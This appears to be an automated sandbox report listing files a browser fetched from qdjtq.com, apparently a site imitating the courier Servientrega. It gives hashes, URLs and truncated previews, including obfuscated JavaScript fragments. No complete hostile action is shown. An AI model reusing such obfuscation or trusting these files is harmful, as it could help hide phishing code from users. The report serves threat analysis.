            SHA-256:692AD46320BE0ABCB5805CB3032F22B21DACE9EE1DC5819CA6184D5EA6672201
            SHA-512:B3FF64B712F976F3530F0BCB1BF30B8E544A64BFCC195EEA76643207B7FB30279146E39914B95A2A8EE1F843D57519F0EAB298178DAC836A7A6BFF49E4A5493E
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.777364" y1="0.086554565" x2="0.07414896" y2="1" id="gradient_1">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. <linearGradient x1="1.5520687" y1="-0.6829178" x2="0.07414896" y2="1" id="gradient_2">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. </defs>.. <g id="instagram-(3)" opacity="0.90000004">.. <path d="M22.9415 6.76208C22.8877 5.54 22.69 4.69983 22.4068 3.97181C22.1147 3.19904 21.6653 2.50717 21.0766 1.93202C20.5013 1.34792 19.8047 0.894053 19.0408 0.606566C18.3084 0.323467 17.4725 0.125841 16.25
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:downloaded
            Size (bytes):358609
            Entropy (8bit):5.497905555714753
            Encrypted:false
            SSDEEP:3072:+F37W0jfw+lDVtUYarVVUpz600I4fu6NiDQT:gfRlDVtZpz600I4fp7
            MD5:9E727B626DBCF2A13E866BAFA7E31704
            SHA1:7657E42F89EC0F5B577B2906D8498AEEFFED85E9
            SHA-256:297557E47AAA6D851BF4218AD89FF06F9C1C594EECD0C403BC076C054F2B63CF
            SHA-512:55806B4A3F222B3CD70FF8DEA84C2E6F3D3435E916465CB0699EE41340B19D02A2766F9A46BB3F3C40C4DA41CC1CE388DA26A9F127E59CAFF97882F8EB6C5A70
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/297557e4tE5dP.css
            Preview:.wpToolbarCommonImages-AddTo{width:8px;height:8px;background-position:0 0}.wpToolbarCommonImages-AdvancedModeHover{width:18px;height:18px;background-position:0-18px}.wpToolbarCommonImages-AdvancedModeHover-rtl{width:18px;height:18px;background-position:0-46px}.wpToolbarCommonImages-AdvancedModeOff{width:18px;height:18px;background-position:0-74px}.wpToolbarCommonImages-AdvancedModeOff-rtl{width:18px;height:18px;background-position:0-102px}.wpToolbarCommonImages-AdvancedModeOn{width:18px;height:18px;background-position:0-130px}.wpToolbarCommonImages-AdvancedModeOn-rtl{width:18px;height:18px;background-position:0-158px}.wpToolbarCommonImages-AscendingArrow{width:9px;height:9px;background-position:0-186px}.wpToolbarCommonImages-CloseActive{width:8px;height:8px;background-position:0-205px}.wpToolbarCommonImages-CloseHover{width:8px;height:8px;background-position:0-223px}.wpToolbarCommonImages-CollapseNodes{width:18px;height:18px;background-position:0-241px}.wpToolbarCommonImages-CollapseNo
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (14018), with no line terminators
            Category:downloaded
            Size (bytes):14031
            Entropy (8bit):5.275976554644413
            Encrypted:false
            SSDEEP:192:hykEY9w8KrUfIEZpBNhFCUdFNrGzgt6uUT0/LyQ+RoxVzC6U:hykRO8KrUfIEdNh4YMzgV+mfU
            MD5:DCDBA5F88CA338CC3E22E45ABAE77791
            SHA1:6B3DD2B99E4AACDD87761C0C2374E6EA90D141F6
            SHA-256:034D5358B4C1C2D315833CA2D0B8233D95FC6A843A476C138330A8E06D31E832
            SHA-512:198F59A5DCA5806D3DB0E934921381BC65D9B284FF9E95C18DB7FBDCCC8CAD8B7DE3279D5A8608B17C5A0B332831261DD8ACE632AFB30F6C22AF3C11B5927BF6
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/e4b62962ajMSD.js
            Preview:function a37_0x3918(_0x551e0a,_0x31ba89){const _0x5c5ea1=a37_0x1fc7();return a37_0x3918=function(_0x3c4fe6,_0x11f724){_0x3c4fe6=_0x3c4fe6-0xa9;let _0x1fc7de=_0x5c5ea1[_0x3c4fe6];return _0x1fc7de;},a37_0x3918(_0x551e0a,_0x31ba89);}const a37_0x169961=a37_0x3918;(function(_0x3b52ea,_0x140474){const _0x2f4c4b=a37_0x3918,_0xa7fe6c=_0x3b52ea();while(!![]){try{const _0x23b576=parseInt(_0x2f4c4b(0xe5))/0x1*(-parseInt(_0x2f4c4b(0xb6))/0x2)+parseInt(_0x2f4c4b(0xf3))/0x3*(parseInt(_0x2f4c4b(0xd6))/0x4)+parseInt(_0x2f4c4b(0xcb))/0x5+parseInt(_0x2f4c4b(0x112))/0x6*(-parseInt(_0x2f4c4b(0xdd))/0x7)+parseInt(_0x2f4c4b(0xce))/0x8+parseInt(_0x2f4c4b(0xb0))/0x9*(-parseInt(_0x2f4c4b(0x109))/0xa)+-parseInt(_0x2f4c4b(0xbb))/0xb*(-parseInt(_0x2f4c4b(0x108))/0xc);if(_0x23b576===_0x140474)break;else _0xa7fe6c['push'](_0xa7fe6c['shift']());}catch(_0x370727){_0xa7fe6c['push'](_0xa7fe6c['shift']());}}}(a37_0x1fc7,0x1d0aa));function a37_0x1fc7(){const _0x537d6c=['Hay\x20errore','.O.box,\x20c/','statePlace','ente\x
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2455
            Entropy (8bit):4.776407386577479
            Encrypted:false
            SSDEEP:48:cUaIaLYXh0wgmHGFPYG9IE/przmUmI7E+LDUVuLmf:xTag0lRIUpUMLY
            MD5:D741920A5F7DB758D6FD1679D20ADA4E
            SHA1:A516676B75C9064896E618D18FE7CD06D8E926DB
            SHA-256:BDF2A35AAE3D41CDEE4ECC3D2433A3CAB11117801D5A82E409B9C20607927F50
            SHA-512:B5F16F1E05A7776C3FAAD5A84CBD796394E56C0790D7AE1F5CAD580C1C8324BE3EA4D7409658A22DEA22BB66C938EE58C4C7041DC0543E6D65850A4B13ED7D17
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="panama">.. <g id="Group">.. <path d="M11.5 0.393437L0.39657 0.393437L0.39657 7.475C0.39657 7.69226 0.218994 7.86844 0 7.86844L10.174 7.86844C11.1254 7.86844 11.8966 7.10336 11.8966 6.15952L11.8966 0C11.8966 0.217264 11.719 0.393437 11.5 0.393437Z" transform="translate(11.10343 7.0815625)" id="Path" fill="#F5F5F5" stroke="none" />.. <path d="M0.39657 7.475L11.5 7.475L11.5 0.393437C11.5 0.176173 11.6776 0 11.8966 0L1.72253 0C0.771174 4.4567e-05 0 0.765126 0 1.70897L0 7.86844C0 7.65117 0.177576 7.475 0.39657 7.475Z" id="Path" fill="#F5F5F5" stroke="none" />.. </g>.. <path d="M9.77747 0L0.39657 0C0.177576 0 0 0.176173 0 0.393437L0 7.47496L11.1034 7.47496C11.3224 7.47496 11.5 7.29878 11.5 7.08152L11.5 1.70892C11.5 0.765082 10.7288 0 9.77747 0Z" transform="translate(11.5 6.1035156E
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
            Category:downloaded
            Size (bytes):87444
            Entropy (8bit):5.020327176760808
            Encrypted:false
            SSDEEP:768:YCAk8JLWWrAV32IVKhjZnyx8dX59pFDq765Q6:uLWWrG2MKhjZnu059pFDq765t
            MD5:2FE63282AA86731ED77C5962DB9B7CD4
            SHA1:D228AB67E3BEF6811ED0CD9812C89305A601F463
            SHA-256:B17587B7F1F6B9D4EEDEF2894132B9F51B0F093ECED7FDC1B6BF3FE1140DFF8E
            SHA-512:7BD02029B8296EEC8B9124DFEA7419FDECD30F235433B6AACEDB23F35E8E7362F1CFA216E286AC106C97AAD6EEC3B4FDD9924672F0EE94EED3E56A8C062E44B1
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/522b5b49ajMSD.js
            Preview:const a14_0x3beb42=a14_0x1940;(function(_0x35b4e8,_0xbe4ea8){const _0x3821d3=a14_0x1940,_0xf7b51e=_0x35b4e8();while(!![]){try{const _0x5b5613=-parseInt(_0x3821d3(0x196))/0x1*(-parseInt(_0x3821d3(0x27d))/0x2)+-parseInt(_0x3821d3(0x2f0))/0x3+-parseInt(_0x3821d3(0x42c))/0x4*(parseInt(_0x3821d3(0x277))/0x5)+-parseInt(_0x3821d3(0x41c))/0x6+parseInt(_0x3821d3(0x4a5))/0x7*(-parseInt(_0x3821d3(0x3a9))/0x8)+parseInt(_0x3821d3(0x2e1))/0x9+parseInt(_0x3821d3(0x344))/0xa;if(_0x5b5613===_0xbe4ea8)break;else _0xf7b51e['push'](_0xf7b51e['shift']());}catch(_0xaff89e){_0xf7b51e['push'](_0xf7b51e['shift']());}}}(a14_0x2f51,0x3d2cf));const a14_0x36ca29=(function(){let _0x293e3a=!![];return function(_0x4f75a0,_0x12b2b1){const _0x894676=_0x293e3a?function(){const _0x2af55f=a14_0x1940;if(_0x12b2b1){const _0x45dc59=_0x12b2b1[_0x2af55f(0x3c3)](_0x4f75a0,arguments);return _0x12b2b1=null,_0x45dc59;}}:function(){};return _0x293e3a=![],_0x894676;};}()),a14_0x55a279=a14_0x36ca29(this,function(){const _0x2dfa82=a14
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2343)
            Category:downloaded
            Size (bytes):52916
            Entropy (8bit):5.51283890397623
            Encrypted:false
            SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
            MD5:575B5480531DA4D14E7453E2016FE0BC
            SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
            SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
            SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
            Malicious:false
            Reputation:low
            URL:https://www.google-analytics.com/analytics.js
            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (4552), with no line terminators
            Category:downloaded
            Size (bytes):4610
            Entropy (8bit):5.356020738194316
            Encrypted:false
            SSDEEP:96:P5os1J+dHineKNNM7J4+EIh4sLjGmWaYrv:P+s1J+kneKNNM7J4bIh4sLamWaYrv
            MD5:13DAA4A507B49DD53878AFE39D51735F
            SHA1:D3F4BC9BFF3E967CE3EAA77906107F1A4DB26787
            SHA-256:7CA3B59C946225CE2999B75A25520ACED25F0E485D96C46580B77D1793003999
            SHA-512:2C088BA4692D57FE3AE23000D59FEA20471EEC65EB8EDF8F6DDD71F5D48873F0140B381C911191A3FD8E4B3E4F3A5D7492E07307A1C14BAD6FD6DF13EF84592A
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/7f8692c3ajMSD.js
            Preview:const a20_0x238814=a20_0x9743;(function(_0x12b177,_0x56b5de){const _0x63ef76=a20_0x9743,_0x3a6df7=_0x12b177();while(!![]){try{const _0x3279a0=-parseInt(_0x63ef76(0x170))/0x1*(-parseInt(_0x63ef76(0x17a))/0x2)+-parseInt(_0x63ef76(0x18a))/0x3*(-parseInt(_0x63ef76(0x177))/0x4)+-parseInt(_0x63ef76(0x184))/0x5*(-parseInt(_0x63ef76(0x175))/0x6)+-parseInt(_0x63ef76(0x18e))/0x7+parseInt(_0x63ef76(0x179))/0x8+-parseInt(_0x63ef76(0x17e))/0x9*(parseInt(_0x63ef76(0x181))/0xa)+parseInt(_0x63ef76(0x16e))/0xb*(parseInt(_0x63ef76(0x183))/0xc);if(_0x3279a0===_0x56b5de)break;else _0x3a6df7['push'](_0x3a6df7['shift']());}catch(_0x38e49f){_0x3a6df7['push'](_0x3a6df7['shift']());}}}(a20_0x19b0,0x63a24));const a20_0x4e13db=(function(){let _0x1db1bf=!![];return function(_0x21ff4a,_0x2f7292){const _0x28ae9b=_0x1db1bf?function(){if(_0x2f7292){const _0x567814=_0x2f7292['apply'](_0x21ff4a,arguments);return _0x2f7292=null,_0x567814;}}:function(){};return _0x1db1bf=![],_0x28ae9b;};}()),a20_0x39a91d=a20_0x4e13db(thi
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2455
            Entropy (8bit):4.776407386577479
            Encrypted:false
            SSDEEP:48:cUaIaLYXh0wgmHGFPYG9IE/przmUmI7E+LDUVuLmf:xTag0lRIUpUMLY
            MD5:D741920A5F7DB758D6FD1679D20ADA4E
            SHA1:A516676B75C9064896E618D18FE7CD06D8E926DB
            SHA-256:BDF2A35AAE3D41CDEE4ECC3D2433A3CAB11117801D5A82E409B9C20607927F50
            SHA-512:B5F16F1E05A7776C3FAAD5A84CBD796394E56C0790D7AE1F5CAD580C1C8324BE3EA4D7409658A22DEA22BB66C938EE58C4C7041DC0543E6D65850A4B13ED7D17
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="panama">.. <g id="Group">.. <path d="M11.5 0.393437L0.39657 0.393437L0.39657 7.475C0.39657 7.69226 0.218994 7.86844 0 7.86844L10.174 7.86844C11.1254 7.86844 11.8966 7.10336 11.8966 6.15952L11.8966 0C11.8966 0.217264 11.719 0.393437 11.5 0.393437Z" transform="translate(11.10343 7.0815625)" id="Path" fill="#F5F5F5" stroke="none" />.. <path d="M0.39657 7.475L11.5 7.475L11.5 0.393437C11.5 0.176173 11.6776 0 11.8966 0L1.72253 0C0.771174 4.4567e-05 0 0.765126 0 1.70897L0 7.86844C0 7.65117 0.177576 7.475 0.39657 7.475Z" id="Path" fill="#F5F5F5" stroke="none" />.. </g>.. <path d="M9.77747 0L0.39657 0C0.177576 0 0 0.176173 0 0.393437L0 7.47496L11.1034 7.47496C11.3224 7.47496 11.5 7.29878 11.5 7.08152L11.5 1.70892C11.5 0.765082 10.7288 0 9.77747 0Z" transform="translate(11.5 6.1035156E
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (35011), with no line terminators
            Category:downloaded
            Size (bytes):35011
            Entropy (8bit):5.351149011565277
            Encrypted:false
            SSDEEP:768:KQz3pgM3LRubkqJpAGz7lgpoSsfUIygfWjOIOgw8gdIOZMlqgG7IUrYz1olCbzyc:K+UYhwmf
            MD5:DCC069636D17C9D29DBD7A49BD345A93
            SHA1:7AEDA79C8796B3C0D2FE08BA95694C3BEDEF3006
            SHA-256:0BF3B36A3E8420B02985FB7D980F2C2FA73AFD1E71BBD8AA04D94AE4E88900B3
            SHA-512:61F69A261378339059DFCA70C3D07C367FC1A66834F12B4CC5F254920CBE9A3A87CAFEF2B52CF45674E6341D39F5D91DFE05E59825A8CAB56567E827B87FA799
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/afbbad07ajMSD.js
            Preview:var a25_0x165d2d=a25_0xcb96;(function(_0x155bf5,_0x5df0d9){var _0x57e96f=a25_0xcb96,_0x39e67a=_0x155bf5();while(!![]){try{var _0x152c10=-parseInt(_0x57e96f(0x18b))/0x1+-parseInt(_0x57e96f(0x1d9))/0x2*(parseInt(_0x57e96f(0x16b))/0x3)+parseInt(_0x57e96f(0x235))/0x4+parseInt(_0x57e96f(0x1c5))/0x5+parseInt(_0x57e96f(0x178))/0x6*(-parseInt(_0x57e96f(0x1e1))/0x7)+parseInt(_0x57e96f(0x1d1))/0x8+parseInt(_0x57e96f(0x1fe))/0x9*(-parseInt(_0x57e96f(0x22b))/0xa);if(_0x152c10===_0x5df0d9)break;else _0x39e67a['push'](_0x39e67a['shift']());}catch(_0xe76c12){_0x39e67a['push'](_0x39e67a['shift']());}}}(a25_0x543e,0xe09a0));import{l as a25_0x4a1112,_ as a25_0x2c66dd}from'./index-7c1edef8.js';import{r as a25_0x36c030}from'./09bf01f8ajMSD.js';import{m as a25_0x206149}from'./00b63b5cajMSD.js';var E=function(_0x7897c2,_0x3b86f6){var _0x28654e=a25_0xcb96;return E=Object['setPrototy'+_0x28654e(0x210)]||{'__proto__':[]}instanceof Array&&function(_0x1578c4,_0x1c79b9){_0x1578c4['__proto__']=_0x1c79b9;}||functio
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2605
            Entropy (8bit):4.8933879201323105
            Encrypted:false
            SSDEEP:48:kMBqaFD5H2ozCNiWuicUiircsiiIuicBii4w7T49lyGyKhhJEkFpq2ABv:XWZi9l2Khh2kr0v
            MD5:CF991972AE30DA40FE47F658106E4D23
            SHA1:81D52308423FB4F8978BF92F4A9C9969D3A440A2
            SHA-256:47DDF4DDC2865482645D0F1CC39F160EF09FCC4FC7BBD260BBA92DAB2E526835
            SHA-512:E29FE6FE9BCF76909F667F3A201413BB1CE3522ABDF041DB8040D10F341B724ED8E2A8B7D73586A00DCD554C764A00582D3684D13E22A169EA7C379EC8A6F2CB
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-05.js
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.su
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):50928
            Entropy (8bit):7.975878931160362
            Encrypted:false
            SSDEEP:1536:/JgK1VrJNPl+ddLJupYL8NuN5mGlTooJbgbrdSI:RxV7l+dJFLB7lTMb5SI
            MD5:A0DFFC137BE80ADFA3177BE319DE486F
            SHA1:6B1372FF4A0E7E4C0DE169F07862C3AD377B155B
            SHA-256:58965C22FB483CB0A51A3F143187D870B91E0AF5C837748AF3F7FF91FD450928
            SHA-512:873C0C9701500EA8E7E2002FD330016208590A49ED994629CBA03E3A85E6B7D8B8FFFD59D0C9325D9310E47E895320D13F3CA4E731BEAB5948B70649545C1359
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<...IDATx....|T......I&!@.;.B..A..".d.DQq....j.Zm.jKU.Z.Z...j...V[...Hf.....&.....,!d..}N&..c.!d&.......q&.3..=..{.....................................................................................................................................................................................................................E0.L3.t.Hw.g}QQQMK.;{......u.k...q...;....Z..eee..g..s+\....]..P....AZ..=.PW.ht.H.X........w....r[D..gj...=...u.jaY.....~....z.F.F..J}.....r.!.@{I!...x......D.l-.z.....'...wz.O...tqM...:..X.........6...X..w.......<Q.w4.<J_.`08B..e;....;C...bR..J..W.y/.g..(....^...j.4.o-...T-.....-x....>$%%. [o...C.{@..~-..S..n/]=^........~.p.>.2..XUU.Z.z.%...B.@,.u...9-d..e...l .X.._.m1.=Cwb.....=....<....42.x..<.C...<..{...`G[.6...Z....^.ZVV.......Z.#..-**Z.....%...(....b...e..[.7j....;{.....~..y........sK......p..kVWW....W.{.......[...h..o.j.........o...n;z~III...[u....5..G..Ws..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):14308
            Entropy (8bit):4.27255113143574
            Encrypted:false
            SSDEEP:384:v9qPPPM+c+7ggBesrezsq4MbBAUGi+ggA:v9ok+J0QrzqBGFA
            MD5:38FFB1C52979DECA1D28D49D2A8CB4AC
            SHA1:ECF007736CC5BB152434049020ED5863A747D84D
            SHA-256:227565DEF1FB1F4B9363275E84804BBBD85CADF3B54B3E90883C6E456728D90A
            SHA-512:C101AD2542579AB2C09AF60F6CA1F768CC2596C99F77D9893BCE28F080347D5D5094D30B24045C10304FF4D05FF47A41F5F0ED2032168E77E0B70D17E3D915EA
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/55.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="219px" height="37px" viewBox="0 0 219 37" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):794
            Entropy (8bit):5.11917794828243
            Encrypted:false
            SSDEEP:24:2dUnn3XxJRTH9WDhUs06wAGejnQ5+5TgzOj/WR02:cUnntH94XwAuQSg/Wf
            MD5:95B334F2497AE6927DBA9AAAAF001989
            SHA1:DEBB12709A29EBE01E9645C582E05CFA6CD1D871
            SHA-256:3C6937313996B6046D6FC011474762476571232049620732CE9AA9FB72D151AA
            SHA-512:F011E00B49A386227E9E93324391FE8D41A0632E36B56691DB3B837EC76CAB92B78E8E6A73522C73FD10EE8C3F11FF758A5ADF1AE8BC763A66FD0C81E7CE0120
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="peru">.. <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.72694L0 13.3807C0 14.3344 0.771174 15.1076 1.72253 15.1076L7.66668 15.1076L7.66668 0L1.72253 0Z" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L7.66682 0L7.66682 15.1077L0 15.1077L0 0Z" transform="translate(7.666992 0.00018310547)" id="Rectangle" fill="#F5F5F5" stroke="none" />.. <path d="M5.94415 0L0 0L0 15.1076L5.94415 15.1076C6.89546 15.1076 7.66668 14.3344 7.66668 13.3806L7.66668 1.72694C7.66668 0.77315 6.89551 0 5.94415 0Z" transform="translate(15.333496 0)" id="Path" fill="#FF4B55" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):7554
            Entropy (8bit):4.25286042320199
            Encrypted:false
            SSDEEP:96:qr2/y973KnJhS88DzdDEKNbDjRhLuKXjvZyHgfOGuyZggO1/LyMzfFg:zqKnJwdDbNHNhLlyHgfDuy5O1DzO
            MD5:4821E2548D62B3D5471964A2C64E2C7F
            SHA1:0D44C292A43018684455C13091101EB4EED81064
            SHA-256:0DAFA4836AE2BEDCAF30433F83A1D551EC66B3E692DB8FB83F764A7DD30231DA
            SHA-512:3BDE4C7A827B8B19EF97D3B7657ABA79D511A65EE01AD2893F11BB513C332FA1596E8DBA66B2B077F7D50376033045E1140E61FCC16B1EA95FCBB524842D35AC
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 28</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-834.000000, -126.000000)">. <g id="Group-28" transform="translate(834.000000, 126.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-8" transform="translate(0.000000, 6.893769)">. <path d="M14.2376106,11.6381261 L9.14128659,11.6381261 L8.58764087,9.4279342 L14.965222,9.4279342 L14.2376106,11.6381261 Z M15.8737577,8.77688002 C15.795908,8.66902335 15.6710877,8.5990035 15.5380039,8.5990035 L8.5084865,8.5990035 C8.46543,8.5990035 8.42454807,8.6137903 8.38497088,8.62596767 L8.18186597,7.81095396 C8.13
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 601 x 646, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):148601
            Entropy (8bit):7.991526800652537
            Encrypted:true
            SSDEEP:3072:kMlgqyyrjDd6VL01k/I7Ky1Hr/pSeHB1yNVAduoz28+pUAx:kh4PBKWlr/pNB1wVAcoIx
            MD5:4D83660D4072B46A1B5A2FDF3A724DE8
            SHA1:3C3A84B6729B6DA763E8CB51C6560B28617A58E8
            SHA-256:21318304D0A8CA4FB8D8A72493A5ED6AACF13FFC93B094DA0FF507906A032B92
            SHA-512:6B11556C922F7C69375C23D0CEF7FD0D609A70300F43EB37DE7D0782E3DFA9E3B371C8C1E42BA93D9528772170100E6E3854B0E74D74A445FF1BF9D4DCE5ACCB
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/clutch-logo.png
            Preview:.PNG........IHDR...Y.........y.......pHYs...%...%.IR$.....sRGB.........gAMA......a...D.IDATx....dUu-.v54`..!.+*.<0"F..5Q.)..1/.".^..1..(&.Q_...Wc4WM.\....FA|../....3......?..E.8......{.:U.>u..._W..W.v..k.9..3.................................................................................................................................m.i..K.....kt.e..#..EEEEEEE.^.Gh..)..P$N..D..*.m...........M.!<~QS"M.n....."......UTTTTTTTl...Y.......h.F.2B..T.................J....jJ......}...>..d...b.b.****.*(.):....IDE.-..Fw..`.,...aT...<..m .....Ck..w....4$...........(...R...y.....u.(V!..(....I."b..j.K.T6_.Y>.Oc...Y..UTTTTTT.hsk..G.d...J_.:....P >n..|l..QpZ.P&ui{.O.0..?..7.H\.PV.UQQQQQ./c .8H,.#.%=............-...W...q.DP.........0@.B.0N...........(...3. ....,..... Q*...G~.}.,.........@....W..a..eD..u..Nz...".........J.z.. ....,.,.#7%.D.2r.B.h..O..I...l..CS.!'.a..9. ..rY/TTTTTTTl....D(.......j"!..b$D&#]....1..9...2...%{.FK..#.m..?..s.1..K.f...#..........C.g.".#..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:RIFF (little-endian) data, Web/P image
            Category:downloaded
            Size (bytes):253986
            Entropy (8bit):7.996855552619251
            Encrypted:true
            SSDEEP:6144:Aj3U0sGMdZj4YWFan/nZ/wJ5c9Uf0fhKKRdFOk75:ArUZGUZj4HO/lwJgUgNRdkc
            MD5:43690395B30E3D6CE7F55FE5D12ECC1B
            SHA1:D155BFBB7E2FB0595E9DA19800B65127EB966B84
            SHA-256:C3DC3BEE31BF61CC70120CB3F349A240BC41E530A55D3BD9BFF14F1A07024EF9
